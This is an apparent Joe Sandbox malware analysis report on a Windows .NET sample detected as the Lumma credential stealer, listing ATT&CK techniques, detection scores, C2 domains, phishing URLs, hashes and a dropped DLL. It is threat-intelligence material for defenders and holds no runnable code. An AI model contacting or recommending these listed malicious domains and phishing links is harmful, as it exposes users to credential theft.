Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
86KZvDaOZR.exe	50%	ReversingLabs	Win32.Spyware.Lummastealer
86KZvDaOZR.exe	59%	Virustotal		Browse
86KZvDaOZR.exe	100%	Avira	HEUR/AGEN.1355612
86KZvDaOZR.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://corruptioncrackywosp.shop/	0%	Avira URL Cloud	safe
corruptioncrackywosp.shop	0%	Avira URL Cloud	safe
messtimetabledkolvk.shop	0%	Avira URL Cloud	safe
horsedwollfedrwos.shop	0%	Avira URL Cloud	safe
https://corruptioncrackywosp.shop:443/apiirusProductWindows	0%	Avira URL Cloud	safe
https://corruptioncrackywosp.shop/apiD	0%	Avira URL Cloud	safe
deprivedrinkyfaiir.shop	0%	Avira URL Cloud	safe
understanndtytonyguw.shop	0%	Avira URL Cloud	safe
detailbaconroollyws.shop	0%	Avira URL Cloud	safe
https://corruptioncrackywosp.shop/apisS	0%	Avira URL Cloud	safe
relaxtionflouwerwi.shop	0%	Avira URL Cloud	safe
considerrycurrentyws.shop	0%	Avira URL Cloud	safe
https://corruptioncrackywosp.shop/api	0%	Avira URL Cloud	safe
patternapplauderw.shop	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
corruptioncrackywosp.shop	104.21.92.10	true	true		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
corruptioncrackywosp.shop	true	Avira URL Cloud: safe	unknown
messtimetabledkolvk.shop	true	Avira URL Cloud: safe	unknown
understanndtytonyguw.shop	true	Avira URL Cloud: safe	unknown
horsedwollfedrwos.shop	true	Avira URL Cloud: safe	unknown
deprivedrinkyfaiir.shop	true	Avira URL Cloud: safe	unknown
detailbaconroollyws.shop	true	Avira URL Cloud: safe	unknown
considerrycurrentyws.shop	true	Avira URL Cloud: safe	unknown
relaxtionflouwerwi.shop	true	Avira URL Cloud: safe	unknown
https://corruptioncrackywosp.shop/api	true	Avira URL Cloud: safe	unknown
patternapplauderw.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	86KZvDaOZR.exe	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	86KZvDaOZR.exe	false	URL Reputation: safe	unknown
https://corruptioncrackywosp.shop/	MSBuild.exe, 00000002.00000002.2148494925.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2147987348.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	86KZvDaOZR.exe	false	URL Reputation: safe	unknown
https://corruptioncrackywosp.shop/apisS	MSBuild.exe, 00000002.00000002.2148494925.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	86KZvDaOZR.exe	false	URL Reputation: safe	unknown
https://corruptioncrackywosp.shop:443/apiirusProductWindows	MSBuild.exe, 00000002.00000002.2147987348.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://corruptioncrackywosp.shop/apiD	MSBuild.exe, 00000002.00000002.2148494925.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.92.10	corruptioncrackywosp.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1448403
Start date and time:	2024-05-28 09:30:51 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	86KZvDaOZR.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	95a8f7184c282154b85d56e37d1cb08c00fc2f6819e5b36ecf2a267c3385bf89
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 114 Number of non-executed functions: 207
Cookbook Comments:	Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.68.123.157, 93.184.221.240, 192.229.221.95
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:31:38	API Interceptor	1x Sleep call for process: 86KZvDaOZR.exe modified
03:31:41	API Interceptor	6x Sleep call for process: MSBuild.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	http://secritybssinespgeaccnt3rd.us.to/notifiscation.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://digitalpersona4491.com/6ox1mkjy	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://gclnk.com/zSArR6Ud	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://secritybssinespgeaccnt3rd.us.to/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://vippsno.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://cnn.compromisedblog.com/XMVFxNmNXUGF4TTFwRzI0c0ZBenZ0YVFnWFdTRWxZZWN6M3AzdHF0QW9hYXVnQmNjelFsQS9hMDJoL1dlT1lOaHJuMUo1VVFHZFNESnZXa0JSZkhjY2p6d3FvODE5R3NTQnNSWHZtejQwbFNDdDR6QjBsbElKWS8rZ3p1RVNGdFAwV0lrTkFsNm5sYTd3RVFDM1k1ZStkV25obEdXK0tHd1dhdHBDTzRKRGFmdWxJN3BvOHFDODRpUi80MVZLWkVmQ0F4UGVZek00dWhxSjVRN29hSnEtLTN6b0tnK2YrQU1JNXprdHItLW81dDhOZUVvQmw1MVpYeG0wKzFzN3c9PQ==?cid=2022767618	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://a0988288.xsph.ru/yoyo334/yoyo322/adobe-home/login.html?log=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveL&log2=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveL	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://aletaxi.pl	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://david-active534.pages.dev/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://taxiwlublinie.pl	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://digitalpersona4491.com/6ox1mkjy	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://gclnk.com/zSArR6Ud	Get hash	malicious	Unknown	Browse	104.21.0.122
	Bestellijst.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	https://cnn.compromisedblog.com/XMVFxNmNXUGF4TTFwRzI0c0ZBenZ0YVFnWFdTRWxZZWN6M3AzdHF0QW9hYXVnQmNjelFsQS9hMDJoL1dlT1lOaHJuMUo1VVFHZFNESnZXa0JSZkhjY2p6d3FvODE5R3NTQnNSWHZtejQwbFNDdDR6QjBsbElKWS8rZ3p1RVNGdFAwV0lrTkFsNm5sYTd3RVFDM1k1ZStkV25obEdXK0tHd1dhdHBDTzRKRGFmdWxJN3BvOHFDODRpUi80MVZLWkVmQ0F4UGVZek00dWhxSjVRN29hSnEtLTN6b0tnK2YrQU1JNXprdHItLW81dDhOZUVvQmw1MVpYeG0wKzFzN3c9PQ==?cid=2022767618	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://a0988288.xsph.ru/yoyo334/yoyo322/adobe-home/login.html?log=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveL&log2=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveL	Get hash	malicious	Unknown	Browse	104.17.246.203
	http://aletaxi.pl	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://david-active534.pages.dev/	Get hash	malicious	Unknown	Browse	172.66.47.156
	http://taxiwlublinie.pl	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://layanan-pemulihan-akun-dana-resmi.program-update.com/	Get hash	malicious	Unknown	Browse	104.26.7.173
	https://layanan-danaa.program-update.com/	Get hash	malicious	Unknown	Browse	172.67.196.204

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://digitalpersona4491.com/6ox1mkjy	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://gclnk.com/zSArR6Ud	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://david-active534.pages.dev/	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://taxiwlublinie.pl	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://layanan-pemulihan-akun-dana-resmi.program-update.com/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://vipps-app.com/d24bc/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://layanan-danaa.program-update.com/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://mail.globaleuropeandasia.duckdns.org/home/login.php?MTcxNjgzMzI5M2Q2OTI0MDk5NDBlODRlODhjNGJkNjc1MDY0NjdkNjEwNDQ4YWVmN2ViNDYxYTJkNjE5NWYzYWM1MDM3ZGMxYTU4MTEyNTkwOA==	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://www.kimchig5g.cloudns.biz/	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://ranadipgithub.github.io/Netflix	Get hash	malicious	Unknown	Browse	23.1.237.91
a0e9f5d64349fb13191bc781f81f42e1	xvJv1BpknZ.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	104.21.92.10
	PxuZ1WpCgf.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	104.21.92.10
	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse	104.21.92.10
	RB_VAC_1.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.92.10
	Tenuto.exe	Get hash	malicious	FormBook, GuLoader, LummaC Stealer	Browse	104.21.92.10
	ZAMOWIEN.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.92.10
	https://docsend.com/view/qqrrvyqndwsixgqg	Get hash	malicious	Phisher	Browse	104.21.92.10
	TEILll7BsZ.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	104.21.92.10
	Pd3mM82Bs6.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	104.21.92.10
	Remittance#26856.html	Get hash	malicious	HTMLPhisher	Browse	104.21.92.10

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse
	t0R4HiIJp7.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	3108_FreeDownloadFiles.zip	Get hash	malicious	PureLog Stealer, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\86KZvDaOZR.exe.log

Download File

Process:	C:\Users\user\Desktop\86KZvDaOZR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\Desktop\86KZvDaOZR.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: CHA0VZiz8y.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, Detection: malicious, Browse Filename: BI6oo9z4In.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: t0R4HiIJp7.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 3108_FreeDownloadFiles.zip, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.349068935137795
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	86KZvDaOZR.exe
File size:	3'939'792 bytes
MD5:	3c2c9ee4db3df5b210a523088a610da8
SHA1:	17e7e65a549333376f65fe7920e8106682f6f070
SHA256:	95a8f7184c282154b85d56e37d1cb08c00fc2f6819e5b36ecf2a267c3385bf89
SHA512:	2c8f28e002ac114d93a68d30ba19722f160d6096a58098c18ac18f3521cf27a5d5cd98ddf30aa217cd7511f1a4f3d9c9da2f4547dbb0515c6dbed040903949d4
SSDEEP:	98304:xJd5AcmqbUWUnorBHNBrPJcc3fUKPSwUwcg:kSUWUn+HNXc+AwUY
TLSH:	E806CE15BA99CE66C16E5637E1D1411483F3C8866722F70F36CA333A1E433EE4D4969E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)w...............P...8...........8.. ....8...@.. ........................;.......<...@................................

File Icon


Icon Hash:	e1e1fdc3e7fefffb

Static PE Info

General

Entrypoint:	0x78b2de
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x967729AC [Wed Dec 29 11:57:32 2049 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=IBM USA, S=IBM USA, L=\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u